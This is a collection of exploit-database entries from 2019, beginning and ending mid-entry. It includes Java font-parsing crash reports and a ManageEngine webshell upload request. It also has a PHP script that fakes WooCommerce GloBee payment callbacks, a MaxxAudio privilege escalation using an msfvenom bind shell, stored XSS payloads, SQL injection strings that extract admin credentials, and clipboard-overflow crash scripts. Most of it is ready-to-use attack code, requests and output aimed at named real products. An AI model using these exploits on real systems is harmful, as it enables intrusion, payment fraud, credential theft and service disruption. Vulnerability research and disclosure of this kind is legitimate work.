RAX: 0x7ffff0283cc0 --> 0x0
[...]
[-------------------------------------code-------------------------------------]
0x7fffc41cb4bb <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+603>: nop DWORD PTR [rax+rax*1+0x0]
0x7fffc41cb4c0 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+608>: lea rax,[rax+rax*4]
0x7fffc41cb4c4 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+612>: lea rax,[rdx+rax*4]
=> 0x7fffc41cb4c8 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+616>: addss xmm0,DWORD PTR [rax]
0x7fffc41cb4cc <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+620>: addss xmm1,DWORD PTR [rax+0x4]
0x7fffc41cb4d1 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+625>: movsxd rax,DWORD PTR [rax+0x10]
0x7fffc41cb4d5 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+629>: test eax,eax
0x7fffc41cb4d7 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+631>:
jns 0x7fffc41cb4c0 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+608>
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffc41cb4c8 in OpenTypeLayoutEngine::adjustGlyphPositions(unsigned short const*, int, int, char, LEGlyphStorage&, LEErrorCode&) ()
from jre/8u202/lib/amd64/libfontmanager.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(3798.db8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x13346:
00007ffa`0c9eb046 8b448a10 mov eax,dword ptr [rdx+rcx*4+10h] ds:00000000`69815274=????????
0:004> ? rdx
Evaluate expression: 1696397556 = 00000000`651cf8f4
0:004> ? rcx
Evaluate expression: 18421340 = 00000000`0119165c
0:004> k
# Child-SP RetAddr Call Site
00 00000000`055ce250 00007ffa`0c9e3c3f fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x13346
01 00000000`055ce3c0 00007ffa`0c9ef6fe fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0xbf3f
02 00000000`055ce420 00000000`056e8d27 fontmanager!Java_sun_font_SunLayoutEngine_nativeLayout+0x21e
03 00000000`055ce750 00000000`055ce750 0x56e8d27
04 00000000`055ce758 00000000`5cb9a4a8 0x55ce750
05 00000000`055ce760 00000000`055ce7c0 0x5cb9a4a8
06 00000000`055ce768 00000000`5cb3fd68 0x55ce7c0
07 00000000`055ce770 00000000`055ce8e8 0x5cb3fd68
08 00000000`055ce778 00000000`00000000 0x55ce8e8
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46410.zip
# Exploit Title: Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 - arbitrary file upload
# Date: 18-02-2019
# Exploit Author: Dao Duy Hung (duyhungattt@gmail.com)
# Vendor Homepage: https://www.manageengine.com/products/service-desk/
# Software Link: https://www.manageengine.com/products/service-desk/download.html?opDownload_indexbnr
# Version: 9.4 and 10.0 before 10.0 build 10012
# Tested on: SDP 10.0 build 10000
# CVE : CVE-2019-8394
Detail:
In file common/FileAttachment.jsp line 332 only check file upload extension when parameter 'module' equal to 'SSP' or 'DashBoard' or 'HomePage', and if parameter 'module' is set to 'CustomLogin' will skip check file upload extension function and upload arbitrary file to folder '/custom/login' and this file can access directly from url 'host:port/custom/login/filename' . An authenticated user with minimum permission (ex: guest) can upload webshell to server.
POST /common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1
Host: localhost:8080
Content-Length: 508
Accept: */*
Origin: http://localhost:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----aaa
Referer: http://localhost:8080/DashBoard.do
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; JSESSIONID=66716A38326AE43058F4A71FCF4E1E42; JSESSIONIDSSO=6970EB5659C20DFF0CF5015D9C91448E; sdpcsrfcookie=ec189770-d1aa-4db3-9a97-36f4ab3db380
Connection: close
------aaa
Content-Disposition: form-data; name="sspsetup"
Attach
------aaa
Content-Disposition: form-data; name="module"
CustomLogin
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.jsp"
Content-Type: text/html
This is shell content
------aaa
Content-Disposition: form-data; name="hmtlcontent"
------aaa--
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f42e9a30f79, pid=43119, tid=0x00007f431d7fc700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libfontmanager.so+0x7f79] AlternateSubstitutionSubtable::process(LEReferenceTo<AlternateSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const+0xe9
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid43119.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the AlternateSubstitutionSubtable::process function attempts to access an invalid memory region:
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x7ffff7fbbc34 --> 0x0
RCX: 0xfff6
RDX: 0x8066
[...]
R12: 0x7ffff0237946 --> 0x100f6ff26000100
[...]
[-------------------------------------code-------------------------------------]
0x7fffcc1aaf72 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+226>:
movzx ecx,cx
0x7fffcc1aaf75 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+229>:
cmp ecx,edx
0x7fffcc1aaf77 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+231>:
jle 0x7fffcc1aaf3e <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+174>
=> 0x7fffcc1aaf79 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+233>:
movzx eax,WORD PTR [r12+rdx*2+0x6]
0x7fffcc1aaf7f <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+239>:
xor edx,edx
0x7fffcc1aaf81 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+241>:
rol ax,0x8
0x7fffcc1aaf85 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+245>:
movzx eax,ax
0x7fffcc1aaf88 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+248>:
add r12,rax
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffcc1aaf79 in AlternateSubstitutionSubtable::process(LEReferenceTo<AlternateSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const () from jre/8u202/lib/amd64/libfontmanager.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(5ae8.5c58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager+0x11a9:
00007ffa`0d6211a9 0fb74c4306 movzx ecx,word ptr [rbx+rax*2+6] ds:00000000`4484a028=????
0:004> ? rbx
Evaluate expression: 1149476694 = 00000000`44839f56
0:004> ? rax
Evaluate expression: 32870 = 00000000`00008066
--- cut ---
Attached with this report is the mutated testcase, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46412.zip
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
Iteration (0,0)
Iteration (0,1)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f857116fde3, pid=31542, tid=0x00007f85a5a70700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libt2k.so+0x4cde3] ExtractBitMap_blocClass+0xcc3
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid31542.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the ExtractBitMap_blocClass function attempts to access an invalid memory region:
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Iteration (0,1)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x96e40 ('@n\t')
RBX: 0x100c4
RCX: 0x12dc8
RDX: 0x757969c4
RSI: 0x7ffff02f7238 --> 0x7840201008
[...]
[-------------------------------------code-------------------------------------]
0x7fffbf616ddb <ExtractBitMap_blocClass+3259>: mov ecx,eax
0x7fffbf616ddd <ExtractBitMap_blocClass+3261>: sar ecx,0x3
0x7fffbf616de0 <ExtractBitMap_blocClass+3264>: movsxd rcx,ecx
=> 0x7fffbf616de3 <ExtractBitMap_blocClass+3267>: movzx edi,BYTE PTR [rsi+rcx*1]
0x7fffbf616de7 <ExtractBitMap_blocClass+3271>: cmp edx,r8d
0x7fffbf616dea <ExtractBitMap_blocClass+3274>: jl 0x7fffbf616dd0 <ExtractBitMap_blocClass+3248>
0x7fffbf616dec <ExtractBitMap_blocClass+3276>: mov ecx,r11d
0x7fffbf616def <ExtractBitMap_blocClass+3279>: mov r13d,0x80
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffbf616de3 in ExtractBitMap_blocClass () from jre/8u202/lib/amd64/libt2k.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(5218.154c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2155:
00007ffa`0b8eb651 468a1c20 mov r11b,byte ptr [rax+r12] ds:00000000`64c09000=??
0:004> ? rax
Evaluate expression: 84720 = 00000000`00014af0
0:004> ? r12
Evaluate expression: 1690256656 = 00000000`64bf4510
0:004> k
# Child-SP RetAddr Call Site
00 00000000`04a8e9d0 00007ffa`0b8ebf92 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2155
01 00000000`04a8eaa0 00007ffa`0b8e8e05 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2a96
02 00000000`04a8eb80 00007ffa`0b8e9011 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0xd4fd
03 00000000`04a8ebf0 00007ffa`0b8daeab t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0xd709
04 00000000`04a8ec90 00000000`04f18d27 t2k!Java_sun_font_T2KFontScaler_getGlyphImageNative+0x163
05 00000000`04a8ed60 00000000`02a3e1f8 0x4f18d27
06 00000000`04a8ed68 00000000`04a8ee48 0x2a3e1f8
07 00000000`04a8ed70 00000000`5c36dff8 0x4a8ee48
08 00000000`04a8ed78 00000000`00000000 0x5c36dff8
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46411.zip
<?php
# Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin [Payment Bypass / Unauthorized Order Status Spoofing]
# Discovery Date: 14.12.2018
# Public Disclosure Date: 14.02.2019
# Exploit Author: GeekHack
# Contact: https://t.me/GeekHack
# Vendor Homepage: https://globee.com/ (previously payb.ee)
# Software Link: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/releases/tag/v1.1.1
# Version: <= 1.1.1
# Tested on: WordPress 4.9.9 + WooCommerce 3.5.1 + GloBee Payment Gateway Plugin 1.1.1
# CVE: CVE-2018-20782
/*
Description:
Reliance on untrusted inputs (CWE-807), insufficient data verification and lack of any cryptographic authentication (hmac etc) at IPN callback (ipn_callback() function in Gateway.php at 374 line) allow remote (even unauthorized) attacker to bypass payment process and spoof real order status without actually paying for it.
[code ref: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/blob/8c254d6100ef4cfb3432b219726f4936c1531234/src/Gateway.php#L374]
Such actions like 'changin order status' normally require administrative rights. But in this case anyone can perform these actions, even with the most limited rights, therefor this issue "can" also be considered as a Privilege Escalation (CWE-269) vulnerability (but it's not quite right, imho).
*/
if(php_sapi_name() !== 'cli')
die('Use CLI: php '.__FILE__);
if(!extension_loaded('curl'))
die('cURL extension is required');
echo 'Payment Bypass (CVE-2018-20782) PoC by GeekHack team.'."\n";
echo 'Select any product(s) in a vulnerable store and continue checkout through payment via cryptocurrencies (GloBee Payment Gateway).'."\n\n";
$shopURL = rtrim(readline('Shop root URL (https://shop.example.com/): '), '/');
if(strpos(@get_headers($shopURL)[0], '200') === false)
die('Shop url is invalid or not exists (or request was blocked), check link format and try again.');
$paymentLink = readline('Payment link (https://globee.com/en/payment-request/XXXXXXXXXXXXXXXXXXXXXX): ');
if(preg_match('/https:\/\/globee\.com\/en\/payment-request\/(\w*)/', $paymentLink, $matches)) {
$paymentID = $matches[1];
}else{
die('Payment link is invalid, check link format and try again.');
}
$orderID = (int)readline('Order ID: ');
if(!$orderID)
die('Order ID is invalid, must be a positive integer, try again.');
$payload = [ // commented fields are not required for exploitation
'id' => $paymentID,
'status' => 'completed',
//'total' => '123.45',
//'currency' => "USD",
'custom_payment_id' => $orderID,
//'callback_data' => "example data",
/*'customer' => [
'name' => 'John Smit',
'email' => 'john.smit@hotmail.com'
],*/
/*'payment_details' => [
'currency' => 'BTC'
],*/
//'redirect_url' => 'http://globee.com/invoice/'.$paymentID,
//'success_url' => $shopURL,
//'cancel_url' => $shopURL,
//'ipn_url' => $shopURL.'/wc-api/globee_ipn_callback',
//'notification_email' => null,
//'confirmation_speed' => 'medium',
//'expires_at' => '2018-01-25 12:31:04',
//'created_at' => '2018-01-25 12:16:04'
];
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => $shopURL.'/wc-api/globee_ipn_callback',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => "",
CURLOPT_MAXREDIRS => 2,
CURLOPT_TIMEOUT => 10,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => 'POST',
CURLOPT_POSTFIELDS => json_encode($payload),
CURLOPT_HTTPHEADER => array(
'cache-control: no-cache',
'content-type: application/json',
),
));
$response = curl_exec($curl);
$err = curl_error($curl);
curl_close($curl);
if ($err) {
echo 'cURL Error #: '.$err;
} else {
echo 'Done: '.$response;
}
# Exploit Title: MaxxAudio Drivers WavesSysSvc64.exe File Permissions SYSTEM Privilege Escalation
# Google Dork:
# Date: 2/18/2019
# Exploit Author: Mike Siegel @ml_siegel
# Vendor Homepage: https://maxx.com
# Software Link:
# Version: 1.6.2.0 (May affect other versions)
# Tested on: Win 10 64 bit
# CVE : CVE-2019-15084
MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations.
MaxxAudio drivers version 1.6.2.0 install with incorrect file permissions. As a result a local attacker can escalate to SYSTEM level privileges.
Dell PSIRT has acknowledged the issue and advises updating to a supported driver.
Proof of concept:
1. Validate incorrect permissions.
C:\Users\user> sc qc wavessyssvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: wavessyssvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
ACME\user:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Users\user>
2. Create payload
Create a service payload in msfvenom, transfer to victim:
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe-service -o service.exe
3. Overwrite file.
The file will be in use, you cannot directly overwrite. However you can move the file and replace.
C:\Users\user> move "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe" "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.bak"
C:\Users\user> copy service.exe "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
4. Reboot the system. Then use netcat or telnet to connect back to 127.0.0.1:4444
C:\WINDOWS\SYSTEM32>whoami
whoami
nt authority\system
Additional information:
This file is embedded in Realtek audio drivers. Dell has since removed this version from their site but it appears to have been released in January 2017.
hash is as follows: cbd0c592c59db94d27ad89db2db7432c0c40db69198d9174eb1bb4bd04e12213 *WavesSysSvc64.exe
# Exploit Title: Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting
# Google Dork: N/A
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://zuz.host/
# Software Link: https://codecanyon.net/item/zuz-music-advance-music-platform-system/21633476
# Version: 2.1
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
ZuzMusic 2.1 suffers from a persistent Cross-Site Scripting vulnerability.
# POC:
----------------------
1. Go To https://[PATH]/contact
2. There are three vulnerable parameters name, subject and message.
3. Inject the JavaScript code.
4. The Injected JavaScript code will be executed when the Administrator open the malicious message https://demos.zuz.host/gmusic/admin/inbox.
# Request:
----------------------
POST /gmusic/zuzconsole/___contact HTTP/1.1
Host: server
Connection: close
Content-Length: 155
Accept: application/json, text/plain, */*
Origin: https://demos.zuz.host
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://server/gmusic/contact
Accept-Encoding: gzip, deflate
X-XSS-Protection: 0
{"type":"general","name":"<script>alert(0)</script>","mail":"mail@example.com","subject":"<script>alert(1)</script>","message":"<script>alert(2)</script>"}
# Response:
----------------------
HTTP/1.1 200 OK
Date: Fri, 15 Feb 2019 01:30:19 GMT
Server: Apache
Connection: close
Content-Type: application/json
Content-Length: 183
{
"kind": "zuz#contactMessageSent",
"etag": "hnwdHsGYwqI6CCSoRSXDMG1BEDTbMMFrOcayLdTYeOs",
"message": "We have recieved your query and will get back to you in 24 hours."
}
# Exploit Title: Listing Hub CMS 1.0 - 'pages.php id' SQL Injection
# Google Dork: inurl:"pages.php?title=privacy-policy"
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/listing-hub-cms-directory-listings-theme/21361294
# Demo Website: https://listing-hub.themerig.com
# Version: 1.0
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
Listing Hub CMS 1.0 suffers from a SQL Injection vulnerability.
# POC:
----------------------
1. Access the following path https://[PATH]/pages.php?title=privacy-policy&id=2
2. You can perform an " error-based" SQL Injection using the payload below
2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20-
# Request:
----------------------
GET /pages.php?id=2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20- HTTP/1.1
Accept-Encoding: gzip, deflate
Host: server
Accept: */*
Connection: close
Cache-Control: no-cache
# Response:
----------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=icrk7uvmqmpsmb4ndt56me8564; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 1149
Vary: Accept-Encoding
Date: Fri, 15 Feb 2019 06:16:21 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="eng">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index,follow"><br />
<b>Notice</b>: Undefined index: title in <b>/home2/otomati5/server/includes/head.php</b> on line <b>71</b><br />
<br />
<b>Warning</b>: PDO::query(): SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '::otomati5_hub@localhost::otomati5_hub::10.1.37-MariaDB-cll-lve:' for key 'group_key' in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />
<br />
<b>Fatal error</b>: Call to a member function fetch() on boolean in <b>/home2/otomati5/listing-hub.themerig.com/includes/head.php</b> on line <b>75</b><br />
# Exploit Title: Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection
# Google Dork: inurl:"assets/external/data.php"
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597
# Demo Website: https://themerig.com/find/
# Version: 1.5
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
Find a Place CMS Directory 1.5 suffers from a SQL Injection vulnerability.
# POC:
----------------------
1. Access the following path https://[PATH]/assets/external/data_2.php
2. You can perform a "Generic UNION query" and extract admin credentials by sending a "POST" request using the payload below
cate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -
# Request:
----------------------
POST /find/assets/external/data_2.php HTTP/1.1
Host: server
Connection: close
Content-Length: 251
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://themerig.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://server/find/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
cate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -
# Response:
----------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=1sml2ou7o5e379b05l3q0iscq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 227
Vary: Accept-Encoding
Date: Fri, 15 Feb 2019 03:09:26 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close
{"data":[{"id":null,"category":null,"title":null,"address":null,"latitude":null,"longitude":null,"marker_color":null,"feaured":null,"marker_image":[""],"featured":"admin::4db50f86732e926e59d306cff063d568::themerig@server"}]}
#Exploit Title: NetSetMan 4.7.1 'Workgroup' - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-17
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: NetSetMan_4.7.1.py
#2.- Open netsetman.txt and copy content to clipboard
#3.- Open NetSetMan
#4.- Enable "Workgroup" and Paste Clipboard
#5.- Click on "Activate"
#6.- Crashed
cod = "\x41" * 100
f = open('netsetman.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: BulletProof FTP Server 2019.0.0.50 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: http://bpftpserver.com/
#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
#Tested Version: 2019.0.0.50
#Tested on: Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: BulletProof_FTP_Server_2019.0.0.50.py
#2.- Open bullet.txt and copy content to clipboard
#3.- Open BulletProof FTP Server
#4.- Select "Settings" > "SMTP"
#5.- In "Email Server" select "SMTP Server" and Paste Clipboard
#6.- Click on "Test"
#7.- Crashed
cod = "\x41" * 257
f = open('bullet.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: https://valentina-db.com/en/
#Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk
#Tested Version: 9.0.4
#Tested on: Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: Valentina_Studio_9.0.4.py
#2.- Open valentina.txt and copy content to clipboard
#3.- Open Valentina Studio
#4.- Select "File" > "Connect to"
#5.- Select "Valentina Server"
#6.- Select "Host" and Paste Clipboard
#7.- Crashed
cod = "\x41" * 256
f = open('valentina.txt', 'w')
f.write(cod)
f.close()
<!--
# Exploit Title: Path traversal vulnerability in Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
